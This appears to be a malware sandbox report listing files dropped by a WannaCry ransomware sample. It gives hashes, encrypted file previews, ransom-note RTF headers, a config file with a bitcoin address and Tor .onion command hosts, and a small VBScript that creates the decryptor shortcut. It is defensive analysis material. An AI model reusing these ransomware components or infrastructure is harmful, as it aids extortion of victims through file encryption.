                                Preview:WANACRY!.....E....A.....1..}1..a.Q.pE....L......O...y...{].....Z..$.D.>....?.B. we.L.d.R.........A .%.{..]..i.w...NJ..|'......&](E.^..?y<QuZy...'.8..b..Da.>.....N.H4AF` h.AA._me.|.......`.;.$..R.W|..9..f%......Ggm.....ZR9.=..2......*.x...@y..2...&k..8_;.K.0...............v.......&..F...O.%q.....t)>.\.(..|u>.,.p...0..Y./.I.?.b...tY.O^b.vC..2.8.MOU.4.u..E..1...,..s].LI......+.y....WB.UK.P^l.G..j.9......H.\..?...X....H....vzK58.=&.qJz..!..].{...L._M...9...E..Hn....Y...y..Fz\5G..Z;..2.........?...........}..:._.Jm...{.7.D(m..p..4.0N....?...G..y..........a;.........}H@.[..r.3.v.hr.w..d.h.A8M...j.+*...k....E..^._.x...i.a.k9.%..?37.v8.F.e..1....K.N..8.....X.3...v_.R.)~.>...w!rD:.N.4....`.....jY...+.s...M..0X.z..d..s%.....CH|".d..JTa.X...)...d.i.d.6......T.s.2f.*..=X.........,=.e;....?.?.I...&UM...........-..Z.....`..D[[.+i..EU...~.:b.^.#.[.....p...S.-V..m.h..K.........`...H.eL.q..g_.......8.}K.:{.w.|3.p.=..[Z8l..p...HI..b\..0;.J.Q.V.~....N..0q...j.p..

                                C:\Users\user\Desktop\ZGGKNSUKOP.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.782388491358477
                                Encrypted:false
                                SSDEEP:24:pQeWISeNeZWSbpbZ79KcYVdIhbDzQGYl7et1KC2qwA6RkE:pwISUewSn79HYVdefcZ1et1hbwAVE
                                MD5:8BF38AFBF8F8E8F7C17A72BF6D60A291
                                SHA1:8BBC577A8989646907DD4D8793F21687D54AAD87
                                SHA-256:6A8F6E4A71FD0855E39AEF798A7F666DB6C6EB2A7A0F3496A126AAEC566BD26E
                                SHA-512:88C3D2338362A9414AB83C82D7D27C765BE3ADB7A98C221EDFCEC1E3EE4BF54F8D2C5F7289F54CA332A2DF6C2599DA5A360528FC57FB81CC8922B99D9D8D4D4F
                                Malicious:false
                                Reputation:unknown
                                Preview:....}?..Q...I(..h.X...7..@...W.a...K.....0...s@|.d..e.FN...A....vC.aB..g....\..H...X....$.8...~.........#..a.lV,.Ck.Y..!L%..6.........=YkT.."/.,..'V...{.S.~A...x/S....E.##.....dF......,X}9.n&..%...\&.8.dy..I.*.....,S.......WY.Lx......W.X..-.q.>....}:...L.@j...Z.y|..=_-....U..r..h......~7G.Y~..?..#Z.&..j.r.:;..j..9...sZ....a&..Q...>..)d.....QZ.s.7.6*.....1.*!...L.P..B....8.AJ.(3.........=.c)..Y. .fD..oOM.E.n.70...^.H.m.04..'.a.f=.....O.K.W..`..aoy...J....:..cd.....}.F..`......`.f.$.....!.5kx8...b2{5...@.eQ.[..o.........y(.My^.....k.)?|.,.{ .N..sH6_........t.6^.Q.k..."..H........9.O.9_...W.V...{'c...!h....u8uK..cGr......j.q..>.Db.W.d5.]Rw... ...&.V............v.......}....].....!;... J+*.E...S..."2..Q.im.Ncd.J.R....!..w]..)....%.P..y.Tt..3h.d.....\m.?| k..c;%/.".2..#..m..M..,...,E;.....r.}^P)..123./JxX.n...V9.:,}.y..F`.VA.....w.G..:^M7.R$..+RT.EK....;e..0..k.9.......$J .~.5..(.Wq...K=d.'.......M.Za......c%*}-A..#...I.j?(D....a...E.E.d.k..q

                                C:\Users\user\Desktop\ZGGKNSUKOP.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814747537623708
                                Encrypted:false
                                SSDEEP:24:bkqb9rTbw3FNMd5E6ImJ0rPyjFc+HbE8fmBaNT4EUqddFvyYEY0rBFba3oL3YJ1W:bkqxDwXW5Qg0rPam+7HbU2yaD3ocb0j
                                MD5:9DBFE0BE7E872CCA3250C56A92A60C9B
                                SHA1:471CAFB3CD00F2926A720B87CB6209548F85C7C5
                                SHA-256:8E9698D220401AD6A0F862AC15E5CEED325001808B7BA7C57E28EA4D48C4499A
                                SHA-512:08C54E2C63197C4E2B4F849F1B7C5F6B6939AEF20BF60098CDCA9D169494286321E3870AAF6F65C46266762C677DE115F494D1CC5223B76A18C5072ED5A287D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......m...-..-IT..\.*).[\......a0.Z..P...Py]....g...>.D...J #Q.}......^.....U..M..<h.=}...a....Z....[O..]...-..7>.%..*. @1r?O...1.-.."-../(.lG....(..wk......l....%..2.....y...d5....9....K..b...=@...."....=...."K.;j.J<. .......{.B.bm.."x.U|.8.'.}................<.0m.}.).@g...w.?...u=.pa..q.=Ol.X...V.`....m\,..&U.....SeL....4..n.+&o.IA..[.}.C...(.6jIy.t.i..*.(..6R(..". .6v..\........h..@.......P...q.N.q.E...+dS.|`...r.r.)DY...6..3.q<.....?M......0...Q...]...=..W)...Q."=..|..}..Y......s..j>fJH.>E..i...Q..G.vJ...K.{)..e`...f..1..RR5......>4..>.1%.s..H'.x..v.........9D.....-"..(I.,..7..lQ.4M...Ml...A$<k6..T...O.D.i>u+...@6.`...O...+...^H9lQ..."...o?.a..J{.....f.........F..........m ..j-J...z..T...qb.j8.........i.h. ..R..z..M.....]V.UT...I......<7.....+...``.<x.<.....Perd}A,..9......=..].=\t<.80y<....W.$.u/....0.HJ.sT`..6.3....S..]...=....`...(.t....!.BLY.Q......l...=...,K^.w].#'x.8tg.......^ .<....E.Q...L...f.H.'.m.JJ...H.w....|...9G.i.

                                C:\Users\user\Desktop\ZGGKNSUKOP.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814747537623708
                                Encrypted:false
                                SSDEEP:24:bkqb9rTbw3FNMd5E6ImJ0rPyjFc+HbE8fmBaNT4EUqddFvyYEY0rBFba3oL3YJ1W:bkqxDwXW5Qg0rPam+7HbU2yaD3ocb0j
                                MD5:9DBFE0BE7E872CCA3250C56A92A60C9B
                                SHA1:471CAFB3CD00F2926A720B87CB6209548F85C7C5
                                SHA-256:8E9698D220401AD6A0F862AC15E5CEED325001808B7BA7C57E28EA4D48C4499A
                                SHA-512:08C54E2C63197C4E2B4F849F1B7C5F6B6939AEF20BF60098CDCA9D169494286321E3870AAF6F65C46266762C677DE115F494D1CC5223B76A18C5072ED5A287D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......m...-..-IT..\.*).[\......a0.Z..P...Py]....g...>.D...J #Q.}......^.....U..M..<h.=}...a....Z....[O..]...-..7>.%..*. @1r?O...1.-.."-../(.lG....(..wk......l....%..2.....y...d5....9....K..b...=@...."....=...."K.;j.J<. .......{.B.bm.."x.U|.8.'.}................<.0m.}.).@g...w.?...u=.pa..q.=Ol.X...V.`....m\,..&U.....SeL....4..n.+&o.IA..[.}.C...(.6jIy.t.i..*.(..6R(..". .6v..\........h..@.......P...q.N.q.E...+dS.|`...r.r.)DY...6..3.q<.....?M......0...Q...]...=..W)...Q."=..|..}..Y......s..j>fJH.>E..i...Q..G.vJ...K.{)..e`...f..1..RR5......>4..>.1%.s..H'.x..v.........9D.....-"..(I.,..7..lQ.4M...Ml...A$<k6..T...O.D.i>u+...@6.`...O...+...^H9lQ..."...o?.a..J{.....f.........F..........m ..j-J...z..T...qb.j8.........i.h. ..R..z..M.....]V.UT...I......<7.....+...``.<x.<.....Perd}A,..9......=..].=\t<.80y<....W.$.u/....0.HJ.sT`..6.3....S..]...=....`...(.t....!.BLY.Q......l...=...,K^.w].#'x.8tg.......^ .<....E.Q...L...f.H.'.m.JJ...H.w....|...9G.i.

                                C:\Users\user\Desktop\ZGGKNSUKOP.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.818267296582887
                                Encrypted:false
                                SSDEEP:24:BTmstLBJY0ipGWXYW23pxraT6g6E0wJvq+rBiGmLOXZ:BTL7YdGpWkpu64bg+81IZ
                                MD5:782D4AA1AD11AC86EE6A39F845787541
                                SHA1:CD0637065E7412AB7231805F69244B8DFBC62F18
                                SHA-256:795D3EC64DBD3227ADFC8FE6FF859A4E0DB749EC6F6C5208FC913771B99E4386
                                SHA-512:04726B4FC69B12A19274BEDE741AA47E2519D23EDA5E08FFBA8C0CA3D67C702DBD072A4129BA7B30680868D73EDA391C0ACD3A0335BF0ED460CF132828F642F5
                                Malicious:false
                                Reputation:unknown
                                Preview:(2..`Q.5..nF.JE../......X....:..W....ydq.E......%<.{.......M.8.[=.Pg.,....l..wLr.....v*@H.:....8J.Y..u6..r..d=G.&y.3...Gg.F._+a..rE^...Fz"..6....`.$....7.L.........KB.....T..3...zd..`C.aD...e_A...3G... ..u5_.!.N....<.F...."...Q.-..........x.5..j(8]cSu.+.<R0.Q....=.i..Q.@....V...D.....N...Z...[...S.I.+.9]...]2..$..R....I..A..G.1...5.j.......7..mr^....E..7&...........".....%0...i.R....!."C4.....j<)..T.0.A....T..........z.7.X.t..._.../.|.........P.-...!..pn.z`}xf..Y......{.r.../C......Gi.R...j.i.....G.r..Fy.p?.cE.F..~mQ.....CioA.B.;..m3.C..H.L...AH..M.Z... ..b.@...q4..r.....hx.N..7..........z..t........3..Q.0..'.b..../..L...>Iv....."x.D.*X.n+.6...M.ECR..K.....e...w....n..T8._..+.?m.....&.......|Q...C.@...F..7...<2..9...h.....xw...j..v.[...H.E.o.......J...T.d%......Ok=..#...._-.|.SS.)..Y.Ls...../6.j.{...s.S}.`....Pl...<......'?......CHY..U.`..E..@A..Z.S.`..V...o...L..o...L`O..6*.P......7X.tk.PH.@_...VYc1.rL....5 ..7.......i=.].r+........

                                C:\Users\user\Desktop\ZGGKNSUKOP.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827752365705742
                                Encrypted:false
                                SSDEEP:24:bkupo3oS1shD5BkamuyFcjG16bBCmMV1+nsWJ6+Ep1faU8:bkwXwshlV9yaJ01MsWJ2pE
                                MD5:4D6055B129CE2C4542A36F434E6AACB4
                                SHA1:3B0EA6FF93B6182AFE7F276B1FD3AD48CE41D47B
                                SHA-256:4CA734347BD2ACA01B66FDD044BC30A21F0543FD645351E2BB2B31141F809540
                                SHA-512:64A1CD147CF9FD6533D2592F1B28DE0849A283873EC72905CB6AC5669F0EA4DB4A1E9633ABE60D8AB44023E666E03019E06FDF57AA0D0F8544A8B51E0C735369
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....US.t...'Q,..#s.).q..{.%>]Z."=......Tw.c.).Q....^..lz.Ts.9U.*&....Z..\...v.e.\jV.(6.=S......l..w{..j..n,X..>>4..b...<e.....E&.h.O../...iE.9.U....`Q.....i.>..E......V.....E.B.'.n...".@.....#..V..B.T.d....N.O...2.RTL....q.t...:4.y.......fU.o..............k..s......a..9.p.w.m..b.l.LI.ZE.\.).`..=...;.A..3....2..MM.oE...:..".....Jo..3U.L.."..Pf..4.'.4M.='.G..l.}}..O.l..._..D...+E...<e.Gt.\......Q...s.,~......T..!j.T....AB.....6.*.......W..L..KC.z......L....O...Af..^..r.....#..q.CYs.._.....%bE.e.G..$.k.@.{...G.q..$. )..x[..CC..3.A>x....b.t..p.cn^..F..P.B..9..2.%._b.....8Q_.>.uE|.R...Ty.'J.(..N\jL.z.3.i3......V'C.l~....*/..C...U..d..:...R........;K(.x].}.B.b'.T.d.d...e..^g..R(...?.F..,..}.UX.c..y.+...."...@I ..>Y....^E....\...E...oDs...s.a.R.#=`U...J...u..B.V>Lz..,s..j..,M>.1.vaH}m.g.tI.D..9.S..e..}Q.0=..f=.J=.......vPJ-.S...:.o..&..9...K!.M.hJ...0.X...o.2......S...-Z..lZ.V%....a..........4....(,.%|)..."cy.m.....-.&V?.5.....)...Z.

                                C:\Users\user\Desktop\ZGGKNSUKOP.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827752365705742
                                Encrypted:false
                                SSDEEP:24:bkupo3oS1shD5BkamuyFcjG16bBCmMV1+nsWJ6+Ep1faU8:bkwXwshlV9yaJ01MsWJ2pE
                                MD5:4D6055B129CE2C4542A36F434E6AACB4
                                SHA1:3B0EA6FF93B6182AFE7F276B1FD3AD48CE41D47B
                                SHA-256:4CA734347BD2ACA01B66FDD044BC30A21F0543FD645351E2BB2B31141F809540
                                SHA-512:64A1CD147CF9FD6533D2592F1B28DE0849A283873EC72905CB6AC5669F0EA4DB4A1E9633ABE60D8AB44023E666E03019E06FDF57AA0D0F8544A8B51E0C735369
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....US.t...'Q,..#s.).q..{.%>]Z."=......Tw.c.).Q....^..lz.Ts.9U.*&....Z..\...v.e.\jV.(6.=S......l..w{..j..n,X..>>4..b...<e.....E&.h.O../...iE.9.U....`Q.....i.>..E......V.....E.B.'.n...".@.....#..V..B.T.d....N.O...2.RTL....q.t...:4.y.......fU.o..............k..s......a..9.p.w.m..b.l.LI.ZE.\.).`..=...;.A..3....2..MM.oE...:..".....Jo..3U.L.."..Pf..4.'.4M.='.G..l.}}..O.l..._..D...+E...<e.Gt.\......Q...s.,~......T..!j.T....AB.....6.*.......W..L..KC.z......L....O...Af..^..r.....#..q.CYs.._.....%bE.e.G..$.k.@.{...G.q..$. )..x[..CC..3.A>x....b.t..p.cn^..F..P.B..9..2.%._b.....8Q_.>.uE|.R...Ty.'J.(..N\jL.z.3.i3......V'C.l~....*/..C...U..d..:...R........;K(.x].}.B.b'.T.d.d...e..^g..R(...?.F..,..}.UX.c..y.+...."...@I ..>Y....^E....\...E...oDs...s.a.R.#=`U...J...u..B.V>Lz..,s..j..,M>.1.vaH}m.g.tI.D..9.S..e..}Q.0=..f=.J=.......vPJ-.S...:.o..&..9...K!.M.hJ...0.X...o.2......S...-Z..lZ.V%....a..........4....(,.%|)..."cy.m.....-.&V?.5.....)...Z.

                                C:\Users\user\Desktop\b.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\c.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):780
                                Entropy (8bit):2.3820348363719486
                                Encrypted:false
                                SSDEEP:6:cMS+pZkaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cMfmaRVcKKfm2MYS3sUQqGLGeTEV
                                MD5:BCBC2EFD9F0436E42A31E0B45451F8BB
                                SHA1:9789EC66E0ACBE6540ACB082AC79A696BB161817
                                SHA-256:3DBCCE0A42F96A87F3778E7CD13BA7195D42CD108DFA080F1C6332443582885E
                                SHA-512:05D49959F048BC523010DBC3A9900BBFCD802BF561DA4D64379996FE1E1ABC3B0D942531095AB041FD940C4D93F8F4BEF7D9AEFAE89DA897551CCB1D965A348A
                                Malicious:false
                                Reputation:unknown
                                Preview:.............................................................................................................>.c...........C......................................................115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\f.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):245
                                Entropy (8bit):5.102105952359427
                                Encrypted:false
                                SSDEEP:6:osEARm5ODN23k6dUVwdQELebJIOSmH4ASwAr8uRbJIOYHAyn:oRjDUBVwLCbJIOVtyguRbJIOYH9
                                MD5:020F549D79A7E06A5C2E2185781816AD
                                SHA1:B1F4A201B3575B0A8806BC8714E475120288DC9B
                                SHA-256:4E29190A26D9ABE6B1FBB4F43248E2449579330F2ACBFA6AA808B24EC30BA476
                                SHA-512:26FCE97F6F0E2A63D84F9275DE8A128448C09D9119730DFF9278DBC8D2ED85ABEA66C0D685F048225CF1FBD6B1A87593E3A2F0D4E1E7E4B788095672941BA446
                                Malicious:false
                                Reputation:unknown
                                Preview:C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY..

                                C:\Users\user\Desktop\m.vbs

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):199
                                Entropy (8bit):4.993433402537439
                                Encrypted:false
                                SSDEEP:3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
                                MD5:BC117AC292350CB5C49A0D1660AFF679
                                SHA1:FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
                                SHA-256:E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
                                SHA-512:B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
                                Malicious:true
                                Reputation:unknown
                                Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

                                C:\Users\user\Desktop\msg\m_bulgarian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):47879
                                Entropy (8bit):4.950611667526586
                                Encrypted:false
                                SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                MD5:95673B0F968C0F55B32204361940D184
                                SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_chinese (simplified).wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):54359
                                Entropy (8bit):5.015093444540877
                                Encrypted:false
                                SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                MD5:0252D45CA21C8E43C9742285C48E91AD
                                SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar

                                C:\Users\user\Desktop\msg\m_chinese (traditional).wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):79346
                                Entropy (8bit):4.901891087442577
                                Encrypted:false
                                SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                MD5:2EFC3690D67CD073A9406A25005F7CEA
                                SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020

                                C:\Users\user\Desktop\msg\m_croatian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):39070
                                Entropy (8bit):5.03796878472628
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                MD5:17194003FA70CE477326CE2F6DEEB270
                                SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_czech.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):40512
                                Entropy (8bit):5.035949134693175
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                Malicious:false
                                Reputation:unknown
